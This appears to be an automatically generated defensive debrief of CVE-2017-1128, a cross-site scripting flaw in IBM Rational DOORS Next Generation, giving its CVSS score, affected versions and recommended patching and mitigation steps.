PatchSiren cyber security CVE debrief

CVE-2017-1128 IBM CVE debrief

CVE-2017-1128 is a cross-site scripting vulnerability in IBM Rational DOORS Next Generation and related Rational Requirements Composer releases. The issue lets a user embed arbitrary JavaScript in the web UI, which can alter intended application behavior and may expose credentials within a trusted session. The record was published on 2017-02-08 and later modified in NVD without changing the original disclosure date.

Vendor: IBM
Product: CVE-2017-1128
CVSS: MEDIUM 5.4
CISA KEV: Not listed in stored evidence
Original CVE published: 2017-02-08
Original CVE updated: 2026-05-13
Advisory published: 2017-02-08
Advisory updated: 2026-05-13

Who should care

Organizations running IBM Rational DOORS Next Generation 4.0, 5.0, or 6.0, and IBM Rational Requirements Composer 4.0.x releases should treat this as relevant, especially if users rely on the web UI for collaboration or requirement management. Administrators, application owners, and security teams should verify whether any affected versions are deployed.

Technical summary

NVD classifies the weakness as CWE-79 (cross-site scripting) with CVSS 3.0 vector CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N. The supplied description indicates that arbitrary JavaScript can be embedded in the web UI, enabling attacker-controlled script execution in a trusted browser session. The reported impact is limited confidentiality and integrity impact, with no availability impact indicated.

Defensive priority

Medium. This is an important web application input-handling flaw with user-interaction requirements and limited scope, but it can still expose session data or manipulate application behavior for affected users.

Recommended defensive actions

Confirm whether IBM Rational DOORS Next Generation or Rational Requirements Composer versions listed by NVD are in use.
Review the IBM PSIRT advisory and apply the vendor patch or mitigation referenced there.
Treat any user-generated content or web UI fields in the affected product as untrusted until patched.
If immediate patching is not possible, reduce exposure by limiting access to the application and restricting who can submit content into affected UI paths.
Monitor for unusual script execution behavior or browser-side anomalies in affected user sessions.

Evidence notes

All statements above are derived from the supplied NVD record and its references. The vulnerability is identified as CWE-79 with the CVSS vector provided in the source item metadata. A vendor advisory and patch reference are listed by IBM PSIRT at http://www.ibm.com/support/docview.wss?uid=swg21996645, and a third-party advisory entry is listed at http://www.securityfocus.com/bid/96017. The supplied corpus does not include patch version details beyond the affected CPE ranges.

Official resources

CVE-2017-1128 CVE record
CVE.org
CVE-2017-1128 NVD detail
NVD
Source item URL
nvd_modified
Mitigation or vendor reference
[email protected] - Patch, Vendor Advisory
Mitigation or vendor reference
[email protected] - Third Party Advisory, VDB Entry

Publicly disclosed on 2017-02-08. The later NVD modified date of 2026-05-13 reflects record maintenance, not the original issue date.